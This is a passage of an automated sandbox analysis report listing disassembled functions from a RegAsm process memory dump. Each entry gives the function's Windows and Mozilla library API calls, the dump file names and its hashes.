                                                                                      • Opcode Fuzzy Hash: e7f10fd2a23b4beefcba04cfcc7f04bcea4e0152ba26d9af16d954e80391790c
                                                                                      • Instruction Fuzzy Hash: 564178B56147108FC710DF34C488B5ABBF6BFC9268F55882DE89A87741EB35E844CB91
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C1282BC,?,?), ref: 6C12649B
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1264A9
                                                                                        • Part of subcall function 6C11FA80: GetCurrentThreadId.KERNEL32 ref: 6C11FA8D
                                                                                        • Part of subcall function 6C11FA80: AcquireSRWLockExclusive.KERNEL32(6C16F448), ref: 6C11FA99
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C12653F
                                                                                      • free.MOZGLUE(?), ref: 6C12655A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 3596744550-0
                                                                                      • Opcode ID: 25abb483c1d5990f6cbbb29702fa7e8f4353dedb08182b80d0842c912661502b
                                                                                      • Instruction ID: f7b036774480c3c37630adabdb6d0df2550854266d3ba3d2d19decb145c54fbf
                                                                                      • Opcode Fuzzy Hash: 25abb483c1d5990f6cbbb29702fa7e8f4353dedb08182b80d0842c912661502b
                                                                                      • Instruction Fuzzy Hash: A6319EB5A043159FC700CF24D884A9ABBF4FF88354F00842EE89A87741DB34E919CB92
                                                                                      APIs
                                                                                      • free.MOZGLUE(?), ref: 6C13A315
                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6C13A31F
                                                                                      • free.MOZGLUE(00000000,?,?,?,?), ref: 6C13A36A
                                                                                        • Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
                                                                                        • Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
                                                                                        • Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2
                                                                                        • Part of subcall function 6C132140: free.MOZGLUE(?,00000060,?,6C137D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C13215D
                                                                                      • free.MOZGLUE(00000000), ref: 6C13A37C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
                                                                                      • String ID:
                                                                                      • API String ID: 700533648-0
                                                                                      • Opcode ID: 462413dd385c85c4bb446ea4695b2bf2997e8ff87b98fd8e0b53c349d2c6a72f
                                                                                      • Instruction ID: faa95637ac181d46a369e132b150b5e85657a25fb54a1b5dcc7f14315b31f2cb
                                                                                      • Opcode Fuzzy Hash: 462413dd385c85c4bb446ea4695b2bf2997e8ff87b98fd8e0b53c349d2c6a72f
                                                                                      • Instruction Fuzzy Hash: E421B071A002349BCB019F46D844B9EBBB9EF8A76CF058015E94D5F701DB36ED06C6D5
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C13D019,?,?,?,?,?,00000000,?,6C12DA31,00100000,?), ref: 6C11FFD3
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,6C13D019,?,?,?,?,?,00000000,?,6C12DA31,00100000,?,?), ref: 6C11FFF5
                                                                                      • free.MOZGLUE(?,?,?,?,?,6C13D019,?,?,?,?,?,00000000,?,6C12DA31,00100000,?), ref: 6C12001B
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C13D019,?,?,?,?,?,00000000,?,6C12DA31,00100000,?,?), ref: 6C12002A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                      • String ID:
                                                                                      • API String ID: 826125452-0
                                                                                      • Opcode ID: 9b38649a5f514e88d93beb2c0f4db07cd94d1cb99ae214e09fc8f9b0765714e1
                                                                                      • Instruction ID: e844dda767bc67a24dfa0482f3e719678595f8ef3bbd23c8f3aca24acaf8abf0
                                                                                      • Opcode Fuzzy Hash: 9b38649a5f514e88d93beb2c0f4db07cd94d1cb99ae214e09fc8f9b0765714e1
                                                                                      • Instruction Fuzzy Hash: 862106B2E002165FD7089E789CD48AFF7BAEB853247254738E535D7780EB70AD0586D0
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,6C1056EE,?,00000001), ref: 6C105B85
                                                                                      • EnterCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105B90
                                                                                      • LeaveCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105BD8
                                                                                      • GetTickCount64.KERNEL32 ref: 6C105BE4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
                                                                                      • String ID:
                                                                                      • API String ID: 2796706680-0
                                                                                      • Opcode ID: f744612a1d5f65614dd1161af0b0ec103fd13b80c5bbfbdb8afa55ca76e37358
                                                                                      • Instruction ID: 1c609ab1c361beb6dd6b879a78d2fe44e2c4732fb5fc2f7fdadb477859334f12
                                                                                      • Opcode Fuzzy Hash: f744612a1d5f65614dd1161af0b0ec103fd13b80c5bbfbdb8afa55ca76e37358
                                                                                      • Instruction Fuzzy Hash: D821A2757053049FCB08CF29C95466ABBF6AF8A214F05C92EE4AA87790DB30A904DB91
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C131B98
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,6C131D96,00000000), ref: 6C131BA1
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,6C131D96,00000000), ref: 6C131BB5
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C131C25
                                                                                        • Part of subcall function 6C131C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6C13759E,?,?), ref: 6C131CB4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
                                                                                      • String ID:
                                                                                      • API String ID: 3699359333-0
                                                                                      • Opcode ID: f9847a5da05b4d075f06d6f027865509aa79d37324e16887e516a47de159a0fb
                                                                                      • Instruction ID: 797f32b49479736967d6e7f583cce2cffba1dbaad44a159635104f7f28a67e91
                                                                                      • Opcode Fuzzy Hash: f9847a5da05b4d075f06d6f027865509aa79d37324e16887e516a47de159a0fb
                                                                                      • Instruction Fuzzy Hash: 9E21D370A042248BDB00DF26C8847BFBBB8AF9635CF20241DD91A6B741DB79E805C7D1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldiv
                                                                                      • String ID:
                                                                                      • API String ID: 3732870572-0
                                                                                      • Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
                                                                                      • Instruction ID: c4fe354646a9557b90d5fffc2a52e947968f5db7d16f9d813de2dab607eef7d9
                                                                                      • Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
                                                                                      • Instruction Fuzzy Hash: 142130B1B00609AFD714DF7DCC85EA7B7F8EB86714B10853EE45ADB750E674A8048BA0
                                                                                      APIs
                                                                                        • Part of subcall function 6C0FBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C147A3F), ref: 6C0FBF11
                                                                                        • Part of subcall function 6C0FBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C147A3F), ref: 6C0FBF5D
                                                                                        • Part of subcall function 6C0FBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C147A3F), ref: 6C0FBF7E
                                                                                      • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C147968
                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C14A264,6C14A264), ref: 6C14799A
                                                                                        • Part of subcall function 6C0F9830: free.MOZGLUE(?,?,?,6C147ABE), ref: 6C0F985B
                                                                                      • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C1479E0
                                                                                      • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C1479E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                      • String ID:
                                                                                      • API String ID: 3421697164-0
                                                                                      • Opcode ID: e14979db0e355b37641e07feae9d83f9896f6672256d6a47f2eec42f1f8dc3c9
                                                                                      • Instruction ID: c5daffe5df76c63cf5a8f16f466185ebff159da3056fc4b59eda2b8ade691d7b
                                                                                      • Opcode Fuzzy Hash: e14979db0e355b37641e07feae9d83f9896f6672256d6a47f2eec42f1f8dc3c9
                                                                                      • Instruction Fuzzy Hash: 2C217A757043049BCB14DF18D888AAEBBE5EF89314F44882CE85A8B351CB30E909DB92
                                                                                      APIs
                                                                                        • Part of subcall function 6C0FBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C147A3F), ref: 6C0FBF11
                                                                                        • Part of subcall function 6C0FBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C147A3F), ref: 6C0FBF5D
                                                                                        • Part of subcall function 6C0FBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C147A3F), ref: 6C0FBF7E
                                                                                      • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6C147A48
                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6C147A7A
                                                                                        • Part of subcall function 6C0F9830: free.MOZGLUE(?,?,?,6C147ABE), ref: 6C0F985B
                                                                                      • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C147AC0
                                                                                      • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C147AC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                      • String ID:
                                                                                      • API String ID: 3421697164-0
                                                                                      • Opcode ID: 15097f35bd0274ef450a5afdabeee40c1cbf70db4287b9d392c8038ee88bd025
                                                                                      • Instruction ID: d9dfeee80c2440d048a9411d81aeca789ad857c0b55b3dbd98538b44eccac4e7
                                                                                      • Opcode Fuzzy Hash: 15097f35bd0274ef450a5afdabeee40c1cbf70db4287b9d392c8038ee88bd025
                                                                                      • Instruction Fuzzy Hash: B5217A757043049BCB14DF18D888AAEBBE5FF89314F00882CE85A8B351CB30E909DB92
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C14AAF8
                                                                                      • EnterCriticalSection.KERNEL32(6C16F770,?,6C10BF9F), ref: 6C14AB08
                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6C10BF9F), ref: 6C14AB39
                                                                                      • LeaveCriticalSection.KERNEL32(6C16F770,?,?,?,?,?,?,?,?,6C10BF9F), ref: 6C14AB6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
                                                                                      • String ID:
                                                                                      • API String ID: 1951318356-0
                                                                                      • Opcode ID: 55d8f80f7cf3dd152522f1d63aa372d208b80a8c2c6cd50f28ab4e8ff4dec82f
                                                                                      • Instruction ID: a647beae03e826d386957a14b0b7815fc03ff362bff4bc37d91039bafeff46df
                                                                                      • Opcode Fuzzy Hash: 55d8f80f7cf3dd152522f1d63aa372d208b80a8c2c6cd50f28ab4e8ff4dec82f
                                                                                      • Instruction Fuzzy Hash: 1B114FB5A002198FCF00DFAAD888DABBBB5FF493187054439E945A7701E734E909CBB1
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C0FB4F5
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C0FB502
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C0FB542
                                                                                      • free.MOZGLUE(?), ref: 6C0FB578
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                      • String ID:
                                                                                      • API String ID: 2047719359-0
                                                                                      • Opcode ID: 7722a19237f743636dc950293bef7e6019ccc43a34b2e7a101f91f6b9cad51f0
                                                                                      • Instruction ID: 6d4a93ecfec6145a4a5fe9afabd9efecf09398070139856180138135b5b8d05c
                                                                                      • Opcode Fuzzy Hash: 7722a19237f743636dc950293bef7e6019ccc43a34b2e7a101f91f6b9cad51f0
                                                                                      • Instruction Fuzzy Hash: A311DF31A04B45C7D3128F2AC804765B3F1FF96718F14970AEC5953E01EBB4A1D69B90
                                                                                      APIs
                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C0EF20E,?), ref: 6C123DF5
                                                                                      • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C0EF20E,00000000,?), ref: 6C123DFC
                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C123E06
                                                                                      • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C123E0E
                                                                                        • Part of subcall function 6C11CC00: GetCurrentProcess.KERNEL32(?,?,6C0E31A7), ref: 6C11CC0D
                                                                                        • Part of subcall function 6C11CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C0E31A7), ref: 6C11CC16
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                      • String ID:
                                                                                      • API String ID: 2787204188-0
                                                                                      • Opcode ID: 44184faf45f52c17dd7cf0eb1d03468a56d83d5d49cd08639f401005e7dd74fd
                                                                                      • Instruction ID: 79a9abbd79b0d9d7d374582d1e036871c29c6a5ff1f3dc728b3313a1f1e19e77
                                                                                      • Opcode Fuzzy Hash: 44184faf45f52c17dd7cf0eb1d03468a56d83d5d49cd08639f401005e7dd74fd
                                                                                      • Instruction Fuzzy Hash: 9DF012B56002087BDB00AB55DC41EBB376DEB46624F044060FE1857741D735BD6996F7
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13205B
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C13201B,?,?,?,?,?,?,?,6C131F8F,?,?), ref: 6C132064
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13208E
                                                                                      • free.MOZGLUE(?,?,?,00000000,?,6C13201B,?,?,?,?,?,?,?,6C131F8F,?,?), ref: 6C1320A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                      • String ID:
                                                                                      • API String ID: 2047719359-0
                                                                                      • Opcode ID: aaf6825c1729b6d4d3663b99e745657345a25e63d5b0d41d034a91b55e1968e8
                                                                                      • Instruction ID: c46922f1f3f6fe21ee42946de508064848386252ed895759fcc6836347c04a21
                                                                                      • Opcode Fuzzy Hash: aaf6825c1729b6d4d3663b99e745657345a25e63d5b0d41d034a91b55e1968e8
                                                                                      • Instruction Fuzzy Hash: BBF0E9712007109BC7119F17D88876BBBF8EF86328F10011AF54A87711CB75E80ADBD5
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EB11
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EB1E
                                                                                      • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C12EB3C
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EB5B
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EBA4
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C12EBAC
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EBC1
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000), ref: 6C12EBCE
                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C12EBE5
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8,00000000), ref: 6C12EC37
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C12EC46
                                                                                      • CloseHandle.KERNEL32(?), ref: 6C12EC55
                                                                                      • free.MOZGLUE(00000000), ref: 6C12EC5C
                                                                                      Strings
                                                                                      • [I %d/%d] profiler_start, xrefs: 6C12EBB4
                                                                                      • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C12EA9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
                                                                                      • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                      • API String ID: 2885072826-1186885292
                                                                                      • Opcode ID: 70c5dfdecec5fbbcee9f7c1379df1daeedbc271e23e2b47ab6bd209b5a60f669
                                                                                      • Instruction ID: b7ae0b539912c09e5d3df4dc61330c8825f402b72963e462cda8d72e4160a847
                                                                                      • Opcode Fuzzy Hash: 70c5dfdecec5fbbcee9f7c1379df1daeedbc271e23e2b47ab6bd209b5a60f669
                                                                                      • Instruction Fuzzy Hash: 3AF0A032305214ABDB009F6BD808BB57BB4AB9225AF000029F925D3F80CB785445EBA9
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C1320B7
                                                                                      • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C11FBD1), ref: 6C1320C0
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C11FBD1), ref: 6C1320DA
                                                                                      • free.MOZGLUE(00000000,?,6C11FBD1), ref: 6C1320F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
